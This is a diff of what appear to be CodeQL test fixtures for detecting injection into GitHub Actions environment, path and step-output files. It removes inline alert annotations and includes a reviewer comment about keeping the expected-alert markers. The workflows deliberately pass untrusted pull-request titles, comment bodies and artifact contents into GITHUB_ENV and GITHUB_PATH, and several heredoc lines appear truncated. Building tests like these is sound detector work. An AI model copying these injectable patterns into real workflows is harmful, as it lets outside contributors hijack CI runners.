@@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 # $ Source + - id: clob1 run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. 
| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | 
@@ -31,3 +22,12 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index 0a19c76c769a..e4845a6f2f16 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml 
@@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Source[actions/envvar-injection/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> "${GITHUB_ENV}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index c157d791f396..67209267b5c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Source[actions/envvar-injection/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index c071d54236d7..d22f09c03bdb 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml 
@@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index 0811e61cfc65..f43a12cb42a3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml 
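Review bot: After this hunk nothing in path1.yml records which steps the envpath-injection test is expected to flag: the five steps that lost their `# $ Alert[actions/envpath-injection/critical]` markers now read the same as the first step (`echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH`), which never had one. I would keep a plain trailing comment on each, for example `# alert expected: PATHINJ is the PR title` and, on the first step, `# no envpath-injection alert expected`, in the spirit of the `# VULNERABLE` / `# NOT VULNERABLE` comments that test16.yml retains. Trailing comments do not seem to move the reported locations, since the path1.yml rows in EnvPathInjectionCritical.expected have the same line and column ranges on both sides of this patch. The same applies to the `@@ -52,12 +52,12 @@` hunk of test4.yml, where two byte-identical `run:` steps differ only in whether `TARGET_BRANCH` comes from `github.head_ref` or from the PR title. The workflow's trigger and job header sit above the hunk.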
@@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config # $ Source[actions/envvar-injection/critical] - run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 58e0f2edf9c2..5edd526d8201 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put runtime versions on the environment" id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 097e3a09a114..3a0c4cc91b82 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put runtime versions on the environment" id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 
@@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put pre-release report on the environment" id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 278cea70f19a..78d288fb9822 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 5b9bd4e278c7..93854c5e889f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml 
@@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 85d6109cd492..89ecd8c0ec3e 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index 87a02ca5a1d9..efcfda0e4c76 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata - - run: | # $ Source[actions/envvar-injection/critical] + - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index de66e4cf253f..c902b7e61bd2 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | # $ Source[actions/envvar-injection/critical] + - run: | unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "pr_number=$(cat NR)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 5059ee9d0da3..f76454c6088f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
@@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | # $ Source[actions/envvar-injection/critical] + - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index f4c6ebcb5b3c..7b30ec8b7e42 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
@@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> "${GITHUB_ENV}" - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> 
"$GITHUB_ENV" FOO=$TITLE - EOF # $ Alert[actions/envvar-injection/critical] + EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cdcc49bde91f..cfc5e6ef1fa5 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml 
@@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] + - name: 'Unzip code coverage' run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 076941d4aece..36340258515e 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=${FOO} >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=$FOO >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index f9e0ea8a3245..c33c90dbb9c6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file # $ Source[actions/envvar-injection/critical] + - name: Load .env file uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' @@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error # $ Alert[actions/envvar-injection/critical] + if-file-not-found: error diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index c84dcae914ca..806f8dc8e45c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment # $ Source[actions/envvar-injection/critical] + - name: assignment run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$foo" >> $GITHUB_ENV - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 6f7d3b9cffcf..3ed80374ef65 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number # $ Source[actions/envvar-injection/critical] + - name: Try to read PR number id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "ref=$ref" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 398a80131733..f544994fc5c1 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
